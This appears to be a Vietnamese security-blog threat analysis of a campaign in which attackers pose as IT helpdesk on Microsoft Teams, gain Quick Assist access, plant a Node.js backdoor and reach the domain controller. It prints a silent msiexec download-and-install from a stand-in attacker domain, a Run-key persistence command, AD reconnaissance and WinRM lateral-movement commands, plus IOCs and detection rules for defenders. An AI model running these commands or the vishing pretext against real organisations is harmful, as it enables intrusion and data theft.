Skip to main content

Command Palette

Search for a command to run...

Từ Một Cuộc Gọi MS Teams Đến Quyền Quản Trị Miền (Domain Admin): Phân Tích Chiến Dịch Impersonating IT Support

Updated
16 min readView as Markdown
Từ Một Cuộc Gọi MS Teams Đến Quyền Quản Trị Miền (Domain Admin): Phân Tích Chiến Dịch Impersonating IT Support

Tổng Quan

Hãy tưởng tượng một buổi sáng làm việc bình thường: nhân viên nhận được tin nhắn trực tiếp trên Microsoft Teams từ một tài khoản mang tên "IT Helpdesk", thông báo máy tính của họ đang phát lưu lượng độc hại và cần xử lý khẩn cấp. Chỉ sau 20 phút trò chuyện điện thoại, người nhân viên hoàn toàn tin tưởng, chủ động bật ứng dụng chính chủ Windows Quick Assist và đọc mã xác thực. Ngay khoảnh khắc nút "Allow" được bấm, ranh giới bảo mật hàng triệu đô-la của doanh nghiệp chính thức bị xuyên thủng mà không kích hoạt bất kỳ cảnh báo EDR hay Firewall nào.

Báo cáo phân tích mới nhất từ Microsoft Security Research phối hợp cùng CyberProof, SOCPrime và Decipher vừa vạch trần chiến dịch tấn công có sự tham gia của con người (human-operated intrusion) cực kỳ nguy hiểm nhắm vào các doanh nghiệp dùng Microsoft 365. Kẻ tấn công không cần đến các lỗ hổng phần mềm phức tạp (zero-day), mà lạm dụng chính tính năng tương tác ngoài (External Collaboration) trên Teams và công cụ chẩn đoán mặc định QuickAssist.exe của Windows 10/11 để biến một phiên hỗ trợ hợp pháp thành cánh cửa mở rộng toàn bộ hạ tầng.

Ngay khi nạn nhân cấp quyền, một kịch bản cài đặt âm thầm (msiexec /q) lập tức diễn ra trong bóng tối: cấy một backdoor chạy trên môi trường Node.js portable, duy trì kênh C2 over HTTPS và mở đường cho kẻ tấn công di chuyển ngang hàng qua giao thức WinRM tới các máy chủ trọng yếu Domain Controller.

Làm thế nào một cú lừa qua ứng dụng Teams lại có thể qua mặt hệ thống phòng thủ tinh vi nhất? Chuỗi tiến trình ngầm đằng sau QuickAssist.exe diễn ra ra sao, và doanh nghiệp của bạn có đang bỏ ngỏ những điểm mù cấu hình nguy hiểm này? Các phần tiếp theo của bài viết sẽ phân tích kỹ thuật chi tiết từng bước của Attack Flow và cung cấp bộ giải pháp phòng thủ hành động.

Timeline Sự Kiện

Dưới đây là chuỗi diễn biến thời gian từ thời điểm tiếp cận nạn nhân đến khi kẻ tấn công làm chủ hạ tầng doanh nghiệp:

  1. Tiếp Cận Ban Đầ: Kẻ tấn công dùng tài khoản Microsoft Teams bên ngoài (External Tenant) giả mạo tên "IT Helpdesk", gửi tin nhắn cảnh báo sự cố vi-rút khẩn cấp.

  2. Thiết Lập Tin Tưởng (Vishing): Gọi thoại trực tiếp qua Teams (vishing kéo dài 10 - 20 phút), thuyết phục nạn nhân mở ứng dụng QuickAssist.exe và cung cấp mã xác thực 6 chữ số.

  3. Chiếm Quyền Remot: Kẻ tấn công kết nối phiên Quick Assist thành công, có đầy đủ quyền thao tác chuột và bàn phím trên máy nạn nhân.

  4. Tải Payload Âm Thầm Thực: thi lệnh ngầm qua cmd.exe / powershell.exe gọi msiexec.exe /q để tải và cài đặt gói installer độc hại từ hạ tầng C2.

  5. Persistence & C2: Gói MSI giải nén node.exe portable + script JavaScript mã hóa, thiết lập kênh C2 HTTPS duy trì kết nối độc lập với phiên Quick Assist.

  6. AD Recon & Lateral Movement: Thu thập thông tin tài khoản miền, nhóm privilege, quét mạng nội bộ và sử dụng WinRM (TCP 5985/5986) để nhảy sang máy chủ khác.

  7. Exfiltration & Staging: Triển khai công cụ Rclone đẩy dữ liệu nhạy cảm lên Cloud Storage, chuẩn bị cho kịch bản Ransomware.

Ma Trận Kill Chain & Attack Flow

Chiến dịch kết hợp nhuần nhuyễn giữa thao túng tâm lý (Social Engineering) và kỹ thuật lạm dụng công cụ hợp pháp (Living-off-the-Land - LotL)

Bước 1: Tiếp Cận Nạn Nhân Qua Microsoft Teams External Collaboration

Mạch tấn công khởi đầu từ một tính năng tưởng chừng rất tiện lợi trên Microsoft Teams: External Collaboration (cho phép tương tác với người dùng ngoài tổ chức). Do phần lớn các doanh nghiệp chưa siết chặt cấu hình này, kẻ tấn công dễ dàng đăng ký một tenant thử nghiệm (Trial Tenant) với các tên hiển thị mang đầy tính uy tín như IT Helpdesk, Security Operations hay System Administrator.

Từ tài khoản mạo danh này, chúng gửi một tin nhắn trực tiếp tới nạn nhân với nội dung thông báo khẩn cấp: "Hệ thống phát hiện máy tính của bạn đang phát lưu lượng độc hại ra ngoài, tài khoản sẽ bị khóa nếu không phối hợp xử lý ngay". Các giải pháp Secure Email Gateway (SEG) truyền thống hoàn toàn bị qua mặt tại bước này, bởi tin nhắn phát sinh trực tiếp bên trong ứng dụng Teams vốn nằm ngoài tầm kiểm soát của bộ lọc email.

Bước 2: Thao Túng Tâm Lý Bằng Cuộc Gọi Vishing

Ngay sau khi gửi tin nhắn tạo tâm lý hoảng loạn, kẻ tấn công lập tức kích hoạt cuộc gọi thoại (Vishing) trực tiếp trên Teams. Theo ghi nhận từ CyberProof, các cuộc gọi này thường kéo dài từ 10 đến 20 phút. Kẻ tấn công kiên nhẫn đóng vai một kỹ sư hỗ trợ chuyên nghiệp, giải thích các mã lỗi giả tạo bằng thuật ngữ chuyên ngành nhằm từng bước xóa bỏ sự nghi ngờ của nạn nhân. Sự kết hợp giữa tin nhắn cảnh báo và cuộc gọi hỗ trợ trực tiếp khiến nạn nhân nhanh chóng rơi vào trạng thái chủ động hợp tác, sẵn sàng tuân thủ mọi chỉ dẫn kỹ thuật được đưa ra.

Bước 3: Chiếm Quyền Điều Khiển Màn Hình Bằng Windows Quick Assist

Thay vì thuyết phục nạn nhân tải về các phần mềm điều khiển từ xa của bên thứ ba dễ bị EDR gắn cờ, nhóm Hacker khai thác trực tiếp Quick Assist (QuickAssist.exe) - công cụ chẩn đoán được Microsoft tích hợp sẵn trên Windows 10 và 11.

Kẻ tấn công sẽ hướng dẫn nạn nhân nhấn tổ hợp phím Ctrl + Windows + Q, đọc mã bảo mật 6 chữ số (Security Code) và nhấn nút "Allow" để cấp toàn bộ quyền thao tác chuột và bàn phím. Lúc này, hệ thống phòng thủ hoàn toàn "lỗi nhịp" do QuickAssist.exe là một tiến trình được Microsoft ký số hợp pháp, kết nối trực tiếp về hạ tầng cloud chính thống của Microsoft (remoteassistance.support.services.microsoft.com), làm cho mọi lưu lượng mạng phát sinh đều trở nên hoàn toàn sạch sẽ dưới mắt EDR và Firewall.

Bước 4: Cài Đặt Silent MSI Trong Bóng Tối Để Cấy Node.js Backdoor

Ngay khi có được quyền điều khiển màn hình, kẻ tấn công nhanh chóng mở cửa sổ lệnh (cmd.exe hoặc powershell.exe) và thực thi câu lệnh tải gói installer độc hại:

msiexec.exe /q /i "https://[attacker-controlled-domain]/update.msi"

Nhờ cờ /q (quiet mode), gói cài đặt thực thi hoàn toàn âm thầm mà không hiển thị bất kỳ cửa sổ thông báo nào trên màn hình nạn nhân. Gói MSI này tiến hành giải nén môi trường Node.js Portable Runtime (node.exe) cùng tệp kịch bản JavaScript đã được mã hóa vào các thư mục tạm như %Temp% hoặc %AppData%. Để che giấu tung tích, tệp thực thi node.exe lập tức được đổi tên thành các dịch vụ hệ thống quen thuộc như svchost_update.exe hoặc ms-sys-service.exe.

Bước 5: Thiết Lập Persistence Và Kênh C2 HTTPS Độc Lập

Để đảm bảo khả năng duy trì truy cập dài hạn kể cả khi phiên Quick Assist kết thúc hoặc máy tính khởi động lại, kẻ tấn công đăng ký một Registry Run Key tự động khởi chạy backdoor:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "NodeService" /t REG_SZ /d "C:\Users\%USERNAME%\AppData\Local\Temp\node.exe C:\Users\%USERNAME%\AppData\Local\Temp\app.js" /f

Ngay sau đó, kịch bản Node.js kích hoạt kết nối ngược (Reverse Connection) về máy chủ Command and Control (C2) qua giao thức HTTPS cổng 443. Từ thời điểm này, kẻ tấn công sở hữu một kênh C2 ẩn ngầm độc lập hoàn toàn với Quick Assist, cho phép chúng thực thi lệnh từ xa, chụp ảnh màn hình và theo dõi thao tác người dùng bất cứ lúc nào.

Bước 6: Trinh Sát Active Directory Và Thu Thập Tài Khoản Quản Trị

Khi đã có được chỗ đứng vững chắc, kẻ tấn công chuyển sang giai đoạn thao tác thủ công (hands-on-keyboard). Chúng liên tục chụp ảnh màn hình nạn nhân để thu thập dữ liệu đang hiển thị, đồng thời sử dụng các lệnh Windows chính chủ để trinh sát hạ tầng Active Directory:

net group "Domain Admins" /domain

nltest /dclist:

dsquery user -name admin

Bước 7: Di Chuyển Ngang Hàng Sang Domain Controller Qua WinRM

Để mở rộng phạm vi kiểm soát sang các máy chủ trọng yếu mà không làm dấy lên cảnh báo từ EDR, kẻ tấn công bỏ qua công cụ PsExec truyền thống và tận dụng giao thức Windows Remote Management (WinRM) — dịch vụ quản trị từ xa tiêu chuẩn chạy trên cổng TCP 5985 (HTTP) và TCP 5986 (HTTPS). Chúng khởi tạo phiên PowerShell Remoting trực tiếp từ máy nạn nhân tới Domain Controller:

Enter-PSSession -ComputerName DC01.corp.internal -Credential (Get-Credential)

Invoke-Command -ComputerName DC01.corp.internal -ScriptBlock { Whoami /all; Get-Process }

Nhờ việc lạm dụng giao thức WinRM hợp pháp, kẻ tấn công chiếm toàn quyền kiểm soát máy chủ Domain Controller mà không cần đẩy thêm bất kỳ tệp tin độc hại nào lên máy chủ này.

Bước 8: Trích Xuất Dữ Liệu Và Triển Khai Ransomware Hàng Loạt

Khi đã nắm trong tay quyền quản trị miền cao nhất, nhóm Hacker thực hiện mắt xích cuối cùng của chiến dịch. Chúng triển khai công cụ mã nguồn mở Rclone (được ngụy trang dưới tên tiến trình hợp pháp) để âm thầm nén và nạp toàn bộ dữ liệu kinh doanh nhạy cảm lên các dịch vụ lưu trữ đám mây như Mega hay Google Drive. Ngay sau khi hoàn tất exfiltration, kẻ tấn công thả các tệp thực thi mã độc tống tiền (như Black Basta) vào thư mục SYSVOL hoặc tạo chính sách Group Policy Object (GPO) mới để ép toàn bộ máy trạm và máy chủ trong hệ thống tự động tải và thực thi mã độc mã hóa dữ liệu.

Đánh Giá Ảnh Hưởng & Rủi Ro Doanh Nghiệp

Chiến dịch tấn công mạo danh IT Support qua Teams và Quick Assist không đơn thuần là một sự cố mất an toàn thông tin tại một máy trạm đơn lẻ, mà mang tới chuỗi rủi ro mang tính hệ thống cho toàn bộ doanh nghiệp:

  • Đình Trệ Vận Hành & Mất Kiểm Soát Hạ Tầng (Operational Breakdown): Khi kẻ tấn công làm chủ các máy chủ quản trị miền (Domain Controller) qua WinRM, chúng có quyền vô hiệu hóa tài khoản người dùng, thay đổi chính sách GPO và tạm ngưng toàn bộ hoạt động CNTT của doanh nghiệp. Kịch bản tồi tệ nhất là hệ thống bị mã hóa hàng loạt bởi Ransomware (như Black Basta), gây gián đoạn vận hành kéo dài nhiều ngày hoặc thậm chí nhiều tuần.

  • Rò Rỉ Dữ Liệu Sở Hữu Trí Tuệ & Bí Mật Kinh Doanh (Intellectual Property & Data Exfiltration): Việc sử dụng Rclone để nén và tải dữ liệu nhạy cảm lên Cloud Storage công cộng trực tiếp đe dọa các tài liệu chiến lược, báo cáo tài chính, hồ sơ nhân sự và dữ liệu khách hàng. Các dữ liệu này thường bị các nhóm tội phạm mạng dùng làm đòn bẩy tống tiền kép (Double Extortion).

  • Phạt Tài Chính & Vi Phạm Pháp Lý (Regulatory & Legal Compliance Risks): Rò rỉ dữ liệu cá nhân của khách hàng và nhân viên khiến doanh nghiệp đối mặt với các hình phạt pháp lý nghiêm trọng theo Nghị định 13/2023/NĐ-CP (về Bảo vệ dữ liệu cá nhân tại Việt Nam) cũng như các tiêu chuẩn quốc tế như GDPR. Chi phí xử lý sự cố, thuê đơn vị ứng cứu, phục hồi dữ liệu và bồi thường thiệt hại có thể lên tới hàng triệu USD.

  • Tổn Hại Uy Tín Thương Hiệu Nặng Nề (Reputational Damage): Việc tên tuổi doanh nghiệp xuất hiện trên các trang công khai dữ liệu đánh cắp (DLS / Leak Sites) của hacker sẽ phá hủy niềm tin của đối tác, khách hàng và cổ đông, gây thiệt hại lâu dài đến giá trị thương hiệu.

IOCs & Artifacts

Process Lineage & Behavioral Artifacts

Host-based Indicators

  • C:\Users\AppData\Local\Temp\node.exe

  • C:\Users\AppData\Roaming\Microsoft\Windows\node_runtime\node.exe

  • C:\ProgramData\NodeJS\node.exe

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NodeService

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdateHelper

File indicators

  • 4cfdcae6dd1d6d98b870c8f0654d504f2bf10479a117dc297de789c249dc389d

  • a4d145a6347e47d40b3ca48af5c6dba01bf019d0110e31a44bb70fc77d1d1676

  • cc6d0f3f47afeba018173604e34f527e8413d3a54ffb35caed529bff49055ec5

  • 0d2fc28af246f62f27e49207d1f64e236ad9ea029412b27877d1ae6c098e86e3

  • 69e10e0cb7bb2137ebea12971adb02c662cf5543a4f8c9530812bcbf7b183a23

  • a135fe4df18c711097e69b4f27ea32a74a955160bf2fb12da841f21866d95d87

Payload delivery infrastructure

Command-and-control infrastructure

  • synctimes[.]australiaeast[.]cloudapp[.]azure[.]com

  • webwether[.]eastus[.]cloudapp[.]azure[.]com

  • dssdfvsdfvsdfvsdgbfbdvdzv[.]org

MITRE ATT&CK Mapping

Tactic Technique ID Technique Name Mô Tả Trong Chiến Dịch
Initial Access T1566.004 Phishing: Spearphishing Service Sử dụng Microsoft Teams External Chat nhắn tin tiếp cận nạn nhân.
Reconnaissance T1598 Phishing for Information Thực hiện cuộc gọi Vishing thu thập thông tin và giả mạo sự cố IT.
Execution T1218.007 System Binary Proxy Execution: Msiexec Chạy msiexec /q âm thầm tải và cài đặt gói MSI chứa Node.js backdoor.
Execution T1059.007 Command and Scripting Interpreter: JavaScript Thực thi kịch bản Node.js/JavaScript độc hại làm C2 implant.
Command and Control T1219 Remote Access Software Lạm dụng Windows Quick Assist để điều khiển thiết bị từ xa.
Command and Control T1071.001 Application Layer Protocol: Web Protocols Duy trì kết nối C2 mã hóa qua HTTPS trên cổng 443.
Lateral Movement T1021.006 Remote Services: Windows Remote Management Di chuyển ngang hàng qua WinRM tới Domain Controller.
Exfiltration T1567.002 Exfiltration to Cloud Storage Sử dụng Rclone đẩy dữ liệu nhạy cảm lên Cloud Storage.

Nhận Định Chuyên Gia & Context Doanh Nghiệp Việt Nam

Shift Tactic: Từ Khai Thác Lỗ Hổng Sang Lạm Dụng Bản Quyền & Tâm Lý Học

Chiến dịch tấn công này cho thấy sự thay đổi chiến thuật rõ rệt của các nhóm tội phạm mạng cao cấp. Thay vì đầu tư chi phí lớn cho zero-day hay các lỗ hổng phần mềm phức tạp (vốn dễ bị phát hiện bởi giải pháp dò quét lỗ hổng), kẻ tấn công tập trung hoàn toàn vào tương tác có xác thực từ người dùng (Credential-backed Interactivity) và các công cụ có sẵn (Living-off-the-Land). Khi nạn nhân tự tay mở Quick Assist và chấp nhận kết nối, mọi rào cản bảo mật ở lớp Perimter đều bị vô hiệu hóa.

Thực Trạng Tại Các Doanh Nghiệp Việt Nam

Qua công tác giám sát SOC cho các khách hàng Enterprise tại Việt Nam, chúng tôi nhận thấy 3 lỗ hổng cấu hình phổ biến:

  1. Teams External Access Mặc Định Mở Rộng: Hầu hết các tổ chức giữ nguyên cấu hình mặc định của Microsoft 365, cho phép tài khoản từ bất kỳ Tenant bên ngoài nào nhắn tin trực tiếp cho nhân viên nội bộ.

  2. Quick Assist Không Được Quản Lý: Quick Assist hiện diện mặc định trên mọi bản cài Windows 10/11 nhưng hiếm khi nằm trong danh sách kiểm soát của chính sách GPO hay AppLocker/WDAC.

  3. Giám Sát WinRM Nội Bộ Còn Trống: Các luồng kết nối WinRM giữa vùng mạng máy trạm (Workstation Zone) và vùng mạng máy chủ (Server Zone) ít khi bị siết chặt quy tắc Firewall hoặc giám sát nhật ký truy cập.

Khuyến Nghị Phòng Thủ Toàn Diện

Hành Động Khẩn Cấp (0 - 24 giờ)

  1. Siết chặt cấu hình Microsoft Teams External Access:

    • Truy cập Microsoft Teams Admin CenterExternal access.

    • Chuyển cấu hình sang chế độ "Allow only specific external domains" (chỉ cho phép kết nối với các đối tác đã xác minh) hoặc tắt hoàn toàn tính năng "Teams users can communicate with external users with Teams accounts not managed by an organization".

  1. Chặn hoặc kiểm soát ứng dụng Quick Assist:

    • Sử dụng Microsoft Intune / Group Policy (GPO) để vô hiệu hóa hoặc gỡ bỏ Quick Assist nếu doanh nghiệp không có nhu cầu sử dụng thực tế.

    • Thêm QuickAssist.exe vào danh sách chặn của chính sách AppLocker hoặc Windows Defender Application Control (WDAC).

Khuyến Nghị Ngắn Hạn (1 - 7 ngày)

  1. Cấu hình EDR & SIEM Detection Rules:

    • Rule 1 (Quick Assist Process Anomaly): Phát hiện khi QuickAssist.exe khởi chạy các tiến trình dòng lệnh (cmd.exe, powershell.exe, msiexec.exe).

    • Rule 2 (Unusual Node.js Execution): Phát hiện sự xuất hiện của tiến trình node.exe hoặc các file thực thi mang chữ ký Node.js chạy từ thư mục %Temp%, %AppData% hoặc %ProgramData%.

    • Rule 3 (WinRM Cross-Zone Traffic): Cảnh báo khi có kết nối WinRM (TCP 5985/5986) khởi tạo từ dải IP máy trạm người dùng tới dải IP Máy chủ Quản trị Miền (Domain Controller).

  2. Ban hành quy trình Out-of-band Verification:

    • Quy định rõ: Bộ phận IT/Helpdesk KHÔNG Bao Giờ chủ động nhắn tin qua Teams từ tài khoản ngoài hoặc yêu cầu cấp quyền Quick Assist mà không có Ticket hỗ trợ mở trước từ người dùng.

    • Hướng dẫn nhân viên bắt buộc phải xác minh lại qua số điện thoại tổng đài nội bộ niêm yết chính thức trước khi chia sẻ màn hình.

Khuyến Nghị Dài Hạn

  1. Triển khai Phishing-resistant MFA:

    • Chuyển đổi từ OTP/Push Notification sang giải pháp MFA kháng Phishing dựa trên tiêu chuẩn FIDO2 (Security Key) hoặc Passkeys để bảo vệ tài khoản Microsoft 365.
  2. Quy Hoạch Mạng & Zero Trust Segregation:

    • Chặn toàn bộ lưu lượng WinRM chiều từ Workstation sang Server ở cấp độ Network Firewall. Chỉ cho phép truy cập WinRM từ các máy chủ quản trị ủy quyền (Jumpbox / Admin Workstation).

Tài Liệu Tham Khảo

Impersonating IT support: how threat actors turn a remote session into enterprise-wide access | Microsoft Security Blog

Fake IT Support Abuses Teams for Enterprise Access

New Campaign Weaponizes Microsoft Teams for Remote Access - Decipher

Teams Social Engineering Attack: Threat Actors Impersonate IT to Steal Credentials via Quick Assist – CyberProof

More from this blog

F

FPT IS Security

986 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.